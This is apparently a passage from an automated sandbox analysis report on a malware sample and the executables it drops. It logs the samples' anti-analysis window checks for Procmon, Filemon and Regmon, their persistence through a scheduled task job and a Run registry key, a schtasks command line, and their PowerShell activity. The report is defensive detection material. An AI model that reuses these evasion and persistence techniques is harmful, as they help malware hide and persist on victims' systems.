                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Uses schtasks.exe or at.exe to add and modify task schedules
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am.cmd
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am.cmd

                                      Hooking and other Techniques for Hiding and Protection

                                      barindex
                                      Loading BitLocker PowerShell Module
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
